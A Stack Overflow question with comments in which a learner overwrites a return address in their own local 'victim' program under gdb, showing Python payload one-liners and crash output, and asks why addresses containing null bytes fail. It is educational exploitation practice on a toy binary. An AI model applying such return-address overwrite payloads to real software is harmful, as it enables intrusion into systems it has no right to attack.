1

I am using buffer overflow to overwrite the return address and calls another function. The name of function I call by overwriting the return address is not_called. Here is how I create the payload

(gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x3b\x42\x08\x08")')

The program works in the above case and not_called function is called. The problem arises when address of not_called is in this format : 0x57d. When I create payload as follows :

(gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')

I get the following error and program won't work.

(gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/aditya/Desktop/victim $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')
/bin/bash: warning: command substitution: ignored null byte in input
0xffffd07c

Program received signal SIGSEGV, Segmentation fault.
0x5600057d in ?? ()

I have two questions:

  • Is bash warning ignoring the bytes 0,0 and not passing them?
  • Second, IF you look at address at SIGSEV, it is 0x5600057d, it should have been 0x0000057d.

How can I create such an address ?

Update : A little hack if someone just wants to experiment or do homework, do static linking (gcc -static) with stdlib.h string.h stdio.h . It will increase your program size. When you disassembe it, it's address will be large enough. There is no general solution to the problem. You can see this post at Security Stackexchange

Aditya Singh Rathore
  • 1,016
  • 6
  • 23
  • 2
    Bash uses C-style null-terminated strings as command-line arguments, so you can't have null bytes in the arguments. This is why exploits use stdin, not arguments. – Barmar Apr 29 '21 at 13:51
  • @Barmar How do I pass this payload ? I can use `gets`. I know I can store it in a file and use pipe. But what do I do inside `gdb` ? – Aditya Singh Rathore Apr 29 '21 at 14:06
  • https://stackoverflow.com/questions/8422259/gdb-debugging-with-piped-input-not-arguments – Barmar Apr 29 '21 at 14:09
  • `r < filename` or `r < <(python -c ...)` – Barmar Apr 29 '21 at 14:09
  • @Barmar Same issue. I still get the address 0x5600057d – Aditya Singh Rathore Apr 29 '21 at 14:15
  • Sounds like an endianness problem, or you're not writing the correct number of bytes before `"\x7d\x05\x00\x00"` – Barmar Apr 29 '21 at 14:18
  • If the first 2 bytes of address are not zero, the program works correctly. If the address is 0x565555ad, the program is going to the `not_called` function when I do "\xad\x55\x55\x56". – Aditya Singh Rathore Apr 29 '21 at 14:24
  • Could python `sys.stdout.write` stop at the first null byte ? – Zilog80 Apr 29 '21 at 14:29
  • No, Python doesn't care about null bytes. And if it did, you wouldn't have gotten the bash error about null bytes being ignored. – Barmar Apr 29 '21 at 14:30
  • @Barmar I'm not a python SME, however it seems that for binary stream it's `sys.stdout.buffer.write(b"")` ? – Zilog80 Apr 29 '21 at 14:33
  • I"m not sure it will make a difference, but can't hurt to try. – Barmar Apr 29 '21 at 14:36
  • @Zilog80 Nope. Did not work – Aditya Singh Rathore Apr 29 '21 at 14:58
  • @Barmar you are correct, there is no way to do so. I finally did static linking with `stdlib.h` `string.h` and `stdlib.h` to increase program size. Now the address of `not_called` is large because so many libraries have been included above it . I thing you should write your comment as an answer so it is clear to anyone in future. – Aditya Singh Rathore Apr 29 '21 at 17:58

0 Answers0